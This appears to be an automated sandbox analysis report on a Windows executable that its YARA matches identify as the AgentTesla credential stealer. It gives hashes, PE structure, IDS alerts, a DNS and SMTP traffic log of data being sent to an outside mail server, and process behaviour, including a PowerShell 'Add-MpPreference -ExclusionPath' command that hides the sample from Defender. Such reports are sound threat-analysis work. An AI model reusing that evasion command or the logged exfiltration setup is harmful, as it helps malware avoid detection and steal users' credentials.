                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.696479217304769
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:QFEWElNtpn.exe
                                                  File size:652'800 bytes
                                                  MD5:a945bae50ebd3643958e988d9c426760
                                                  SHA1:37bac3a7024ac33a23b5f1508458884379493007
                                                  SHA256:b612dbe8660225d074563250626237783bfdeedf5bb38d5af1e2789690787fc8
                                                  SHA512:d0c26623daa3319347b711a76a7e0303c1c314c07796524c53b127bbf819ef4678609417612bc3fb84850397229cc2b2f56ada5f65f4854e1dce9939078f806d
                                                  SSDEEP:12288:Lcir1S2IoOAc6/5rZGmy4fXPwZno/CgxkXylasUdibW3B6287FkhqCRG1P8z+/vV:pXPw9o7kNsKAB3RkhDRJz+/vqVR0
                                                  TLSH:58D4F0503668AC27C1BA4BF20530E57603B76E8A7821F3CA8DD9BDDB71F7B906640653
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...YH................0.................. ... ....@.. .......................`............@................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x4a0d12
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x96A24859 [Mon Jan 31 04:55:53 2050 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa0cc00x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x3c0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xa0ca40x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x9ed180x9ee0049aaa2ed9b40d666138ead7f888ac3faFalse0.8636869345003934data7.704913820171082IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xa20000x3c00x40055c8a80dbeb06709abbfc72d1c1b3c03False0.3720703125data3.063205083227288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa40000xc0x200ccba6dc5e0c69a7f1d0de587800b453bFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0xa20580x364data0.4009216589861751
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-03T16:30:38.529974+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.649710199.79.62.115587TCP
                                                  2024-12-03T16:30:38.529974+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.649710199.79.62.115587TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 3, 2024 16:30:47.414318085 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:47.536590099 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:47.536709070 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:48.819721937 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:48.823846102 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:48.943758011 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:49.218909025 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:49.223361969 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:49.343559027 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:49.618942976 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:49.623336077 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:49.746381044 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:50.123863935 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:50.124110937 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:50.245156050 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:50.519146919 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:50.519376040 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:50.639659882 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:50.925261021 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:50.925626040 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:51.045610905 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:51.320597887 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:51.321171045 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:51.321259975 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:51.321310043 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:51.321310043 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:30:51.443802118 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:51.444088936 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:51.444098949 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:51.444175959 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:51.822041988 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:30:51.873687983 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:32:27.030611992 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:32:27.151977062 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:32:27.629142046 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:32:27.629189014 CET58749710199.79.62.115192.168.2.6
                                                  Dec 3, 2024 16:32:27.629295111 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:32:27.629436016 CET49710587192.168.2.6199.79.62.115
                                                  Dec 3, 2024 16:32:27.750144005 CET58749710199.79.62.115192.168.2.6
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 3, 2024 16:30:47.007868052 CET5474553192.168.2.61.1.1.1
                                                  Dec 3, 2024 16:30:47.406609058 CET53547451.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 3, 2024 16:30:47.007868052 CET192.168.2.61.1.1.10xc2d3Standard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 3, 2024 16:30:47.406609058 CET1.1.1.1192.168.2.60xc2d3No error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Dec 3, 2024 16:30:48.819721937 CET58749710199.79.62.115192.168.2.6220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Tue, 03 Dec 2024 21:00:48 +0530
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Dec 3, 2024 16:30:48.823846102 CET49710587192.168.2.6199.79.62.115EHLO 910646
                                                  Dec 3, 2024 16:30:49.218909025 CET58749710199.79.62.115192.168.2.6250-md-54.webhostbox.net Hello 910646 [8.46.123.228]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPECONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Dec 3, 2024 16:30:49.223361969 CET49710587192.168.2.6199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                  Dec 3, 2024 16:30:49.618942976 CET58749710199.79.62.115192.168.2.6334 UGFzc3dvcmQ6
                                                  Dec 3, 2024 16:30:50.123863935 CET58749710199.79.62.115192.168.2.6235 Authentication succeeded
                                                  Dec 3, 2024 16:30:50.124110937 CET49710587192.168.2.6199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                  Dec 3, 2024 16:30:50.519146919 CET58749710199.79.62.115192.168.2.6250 OK
                                                  Dec 3, 2024 16:30:50.519376040 CET49710587192.168.2.6199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                  Dec 3, 2024 16:30:50.925261021 CET58749710199.79.62.115192.168.2.6250 Accepted
                                                  Dec 3, 2024 16:30:50.925626040 CET49710587192.168.2.6199.79.62.115DATA
                                                  Dec 3, 2024 16:30:51.320597887 CET58749710199.79.62.115192.168.2.6354 Enter message, ending with "." on a line by itself
                                                  Dec 3, 2024 16:30:51.321310043 CET49710587192.168.2.6199.79.62.115.
                                                  Dec 3, 2024 16:30:51.822041988 CET58749710199.79.62.115192.168.2.6250 OK id=1tIUrT-001zNQ-0N
                                                  Dec 3, 2024 16:32:27.030611992 CET49710587192.168.2.6199.79.62.115QUIT
                                                  Dec 3, 2024 16:32:27.629142046 CET58749710199.79.62.115192.168.2.6221 md-54.webhostbox.net closing connection

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:10:30:42
                                                  Start date:03/12/2024
                                                  Path:C:\Users\user\Desktop\QFEWElNtpn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\QFEWElNtpn.exe"
                                                  Imagebase:0x410000
                                                  File size:652'800 bytes
                                                  MD5 hash:A945BAE50EBD3643958E988D9C426760
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2142022582.0000000003899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:10:30:43
                                                  Start date:03/12/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe"
                                                  Imagebase:0xb90000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:10:30:43
                                                  Start date:03/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:10:30:43
                                                  Start date:03/12/2024
                                                  Path:C:\Users\user\Desktop\QFEWElNtpn.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\QFEWElNtpn.exe"
                                                  Imagebase:0x250000
                                                  File size:652'800 bytes
                                                  MD5 hash:A945BAE50EBD3643958E988D9C426760
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:10:30:43
                                                  Start date:03/12/2024
                                                  Path:C:\Users\user\Desktop\QFEWElNtpn.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\QFEWElNtpn.exe"
                                                  Imagebase:0x320000
                                                  File size:652'800 bytes
                                                  MD5 hash:A945BAE50EBD3643958E988D9C426760
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:10:30:43
                                                  Start date:03/12/2024
                                                  Path:C:\Users\user\Desktop\QFEWElNtpn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\QFEWElNtpn.exe"
                                                  Imagebase:0xe40000
                                                  File size:652'800 bytes
                                                  MD5 hash:A945BAE50EBD3643958E988D9C426760
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.3358494452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3360471462.000000000325A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3360471462.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3360471462.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:10:30:46
                                                  Start date:03/12/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff717f30000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:9.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:8.3%
                                                    Total number of Nodes:48
                                                    Total number of Limit Nodes:7
                                                    execution_graph 34412 6b94618 34413 6b94640 34412->34413 34416 6b9466c 34412->34416 34414 6b94649 34413->34414 34417 6b93aa4 34413->34417 34418 6b93aaf 34417->34418 34419 6b94963 34418->34419 34421 6b93ac0 34418->34421 34419->34416 34422 6b94998 OleInitialize 34421->34422 34423 6b949fc 34422->34423 34423->34419 34424 186d600 DuplicateHandle 34425 186d696 34424->34425 34464 6b91080 34465 6b910c2 34464->34465 34467 6b910c9 34464->34467 34466 6b9111a CallWindowProcW 34465->34466 34465->34467 34466->34467 34426 1867e88 34427 1867e8d 34426->34427 34428 1867eab 34427->34428 34430 18690f8 34427->34430 34431 1869102 34430->34431 34432 1869122 34431->34432 34435 6b52f38 34431->34435 34441 6b52f48 34431->34441 34432->34427 34437 6b52f5d 34435->34437 34436 6b531a8 34436->34432 34437->34436 34438 6b53840 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34437->34438 34439 6b535d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34437->34439 34440 6b535c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34437->34440 34438->34437 34439->34437 34440->34437 34443 6b52f5d 34441->34443 34442 6b531a8 34442->34432 34443->34442 34444 6b53840 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34443->34444 34445 6b535d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34443->34445 34446 6b535c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 34443->34446 34444->34443 34445->34443 34446->34443 34447 186df08 34449 186df36 34447->34449 34451 186cccc 34449->34451 34450 186df56 34450->34450 34452 186ccd7 34451->34452 34453 186e8f7 34452->34453 34456 6b954d0 34452->34456 34460 6b954c0 34452->34460 34453->34450 34457 6b95535 34456->34457 34458 6b95998 WaitMessage 34457->34458 34459 6b95582 34457->34459 34458->34457 34459->34453 34462 6b954d0 34460->34462 34461 6b95582 34461->34453 34462->34461 34463 6b95998 WaitMessage 34462->34463 34463->34462

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1061 6b9aa40-6b9aa5e 1062 6b9aa60-6b9aa63 1061->1062 1063 6b9aa70-6b9aa73 1062->1063 1064 6b9aa65-6b9aa6f 1062->1064 1065 6b9aaa2-6b9aaa5 1063->1065 1066 6b9aa75-6b9aa9d 1063->1066 1067 6b9aabc-6b9aabf 1065->1067 1068 6b9aaa7-6b9aab5 1065->1068 1066->1065 1070 6b9aac1-6b9aadd 1067->1070 1071 6b9aae2-6b9aae4 1067->1071 1077 6b9aaf4-6b9ab0a 1068->1077 1078 6b9aab7 1068->1078 1070->1071 1072 6b9aaeb-6b9aaee 1071->1072 1073 6b9aae6 1071->1073 1072->1062 1072->1077 1073->1072 1082 6b9ad3b-6b9ad45 1077->1082 1083 6b9ab10-6b9ab19 1077->1083 1078->1067 1085 6b9ab1f-6b9ab44 1083->1085 1086 6b9ad46-6b9ad7f 1083->1086 1099 6b9ad28-6b9ad35 1085->1099 1100 6b9ab4a-6b9ab7a 1085->1100 1089 6b9ad81-6b9ad84 1086->1089 1090 6b9ad8a-6b9adaf 1089->1090 1091 6b9ae4c-6b9ae4f 1089->1091 1117 6b9adb6-6b9adb8 1090->1117 1093 6b9ae55-6b9ae64 1091->1093 1094 6b9b0b7-6b9b0ba 1091->1094 1105 6b9ae83-6b9aec7 1093->1105 1106 6b9ae66-6b9ae81 1093->1106 1096 6b9b0dd-6b9b0df 1094->1096 1097 6b9b0bc-6b9b0d8 1094->1097 1102 6b9b0e1 1096->1102 1103 6b9b0e6-6b9b0e9 1096->1103 1097->1096 1099->1082 1099->1083 1100->1099 1130 6b9ab80-6b9ab89 1100->1130 1102->1103 1103->1089 1108 6b9b0ef-6b9b0f8 1103->1108 1114 6b9b08b-6b9b0a0 1105->1114 1115 6b9aecd-6b9aede 1105->1115 1106->1105 1114->1094 1126 6b9aee4-6b9af07 1115->1126 1127 6b9b076-6b9b085 1115->1127 1120 6b9adba-6b9adc0 1117->1120 1121 6b9add0-6b9add4 1117->1121 1124 6b9adc2 1120->1124 1125 6b9adc4-6b9adc6 1120->1125 1128 6b9ade2 1121->1128 1129 6b9add6-6b9ade0 1121->1129 1124->1121 1125->1121 1126->1127 1145 6b9af0d-6b9b030 1126->1145 1127->1114 1127->1115 1131 6b9ade7-6b9ade9 1128->1131 1129->1131 1130->1086 1132 6b9ab8f-6b9abb1 1130->1132 1135 6b9adeb-6b9adee 1131->1135 1136 6b9ae00-6b9ae3f 1131->1136 1143 6b9abb7-6b9abdf call 6b93598 1132->1143 1144 6b9ad16-6b9ad22 1132->1144 1135->1108 1136->1093 1156 6b9ae41-6b9ae4b 1136->1156 1157 6b9ad0c-6b9ad11 1143->1157 1158 6b9abe5-6b9ac0d 1143->1158 1144->1099 1144->1130 1208 6b9b03e 1145->1208 1209 6b9b032-6b9b03c 1145->1209 1157->1144 1158->1157 1164 6b9ac13-6b9ac41 1158->1164 1164->1157 1169 6b9ac47-6b9ac51 1164->1169 1169->1157 1171 6b9ac57-6b9ac91 1169->1171 1181 6b9ac9c-6b9acb8 1171->1181 1182 6b9ac93-6b9ac97 1171->1182 1181->1144 1184 6b9acba-6b9ad0a 1181->1184 1182->1157 1183 6b9ac99 1182->1183 1183->1181 1184->1144 1210 6b9b043-6b9b045 1208->1210 1209->1210 1210->1127 1211 6b9b047-6b9b04c 1210->1211 1212 6b9b05a 1211->1212 1213 6b9b04e-6b9b058 1211->1213 1214 6b9b05f-6b9b061 1212->1214 1213->1214 1214->1127 1215 6b9b063-6b9b06f 1214->1215 1215->1127
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3365184815.0000000006B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6b90000_QFEWElNtpn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Uc<$c<$c<
                                                    • API String ID: 0-4092649198
                                                    • Opcode ID: 1c7db9f571e5d717279aa4d5973f0b2c9a03735ecc3735f8e568f80c74b66487
                                                    • Instruction ID: ccd8b92a3c7c29c78dd5175291eec3946fbbe7a05e0a744553e8a3a5af168b2b
                                                    • Opcode Fuzzy Hash: 1c7db9f571e5d717279aa4d5973f0b2c9a03735ecc3735f8e568f80c74b66487
                                                    • Instruction Fuzzy Hash: 2B02AE70B012168FDF54DB78D5946AEB7E2EF89300F2485B9D406EB391EB35DC4287A1

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1313 6b954d0-6b95533 1314 6b95562-6b95580 1313->1314 1315 6b95535-6b9555f 1313->1315 1320 6b95589-6b955c0 1314->1320 1321 6b95582-6b95584 1314->1321 1315->1314 1325 6b959f1 1320->1325 1326 6b955c6-6b955da 1320->1326 1323 6b95a42-6b95a57 1321->1323 1329 6b959f6-6b95a0c 1325->1329 1327 6b95609-6b95628 1326->1327 1328 6b955dc-6b95606 1326->1328 1335 6b9562a-6b95630 1327->1335 1336 6b95640-6b95642 1327->1336 1328->1327 1329->1323 1340 6b95632 1335->1340 1341 6b95634-6b95636 1335->1341 1337 6b95661-6b9566a 1336->1337 1338 6b95644-6b9565c 1336->1338 1342 6b95672-6b95679 1337->1342 1338->1329 1340->1336 1341->1336 1343 6b9567b-6b95681 1342->1343 1344 6b95683-6b9568a 1342->1344 1345 6b95697-6b956b4 call 6b93b5c 1343->1345 1346 6b9568c-6b95692 1344->1346 1347 6b95694 1344->1347 1350 6b95809-6b9580d 1345->1350 1351 6b956ba-6b956c1 1345->1351 1346->1345 1347->1345 1352 6b959dc-6b959ef 1350->1352 1353 6b95813-6b95817 1350->1353 1351->1325 1354 6b956c7-6b95704 1351->1354 1352->1329 1355 6b95819-6b9582c 1353->1355 1356 6b95831-6b9583a 1353->1356 1360 6b9570a-6b9570f 1354->1360 1361 6b959d2-6b959d6 1354->1361 1355->1329 1358 6b95869-6b95870 1356->1358 1359 6b9583c-6b95866 1356->1359 1362 6b9590f-6b95924 1358->1362 1363 6b95876-6b9587d 1358->1363 1359->1358 1366 6b95741-6b95756 call 6b93b80 1360->1366 1367 6b95711-6b95718 call 6b93b68 1360->1367 1361->1342 1361->1352 1362->1361 1377 6b9592a-6b9592c 1362->1377 1364 6b958ac-6b958ce 1363->1364 1365 6b9587f-6b958a9 1363->1365 1364->1362 1403 6b958d0-6b958da 1364->1403 1365->1364 1375 6b9575b-6b9575f 1366->1375 1373 6b9571d-6b9571f 1367->1373 1373->1366 1378 6b95721-6b9573f call 6b93b74 1373->1378 1379 6b95761-6b95773 call 6b93b8c 1375->1379 1380 6b957d0-6b957dd 1375->1380 1381 6b95979-6b95996 call 6b93b5c 1377->1381 1382 6b9592e-6b95967 1377->1382 1378->1375 1405 6b957b3-6b957cb 1379->1405 1406 6b95775-6b957a5 1379->1406 1380->1361 1397 6b957e3-6b957ed call 6b93b9c 1380->1397 1381->1361 1396 6b95998-6b959c4 WaitMessage 1381->1396 1393 6b95969-6b9596f 1382->1393 1394 6b95970-6b95977 1382->1394 1393->1394 1394->1361 1400 6b959cb 1396->1400 1401 6b959c6 1396->1401 1410 6b957fc-6b95804 call 6b93bb4 1397->1410 1411 6b957ef-6b957f7 call 6b93ba8 1397->1411 1400->1361 1401->1400 1412 6b958dc-6b958e2 1403->1412 1413 6b958f2-6b9590d 1403->1413 1405->1329 1420 6b957ac 1406->1420 1421 6b957a7 1406->1421 1410->1361 1411->1361 1417 6b958e4 1412->1417 1418 6b958e6-6b958e8 1412->1418 1413->1362 1413->1403 1417->1413 1418->1413 1420->1405 1421->1420
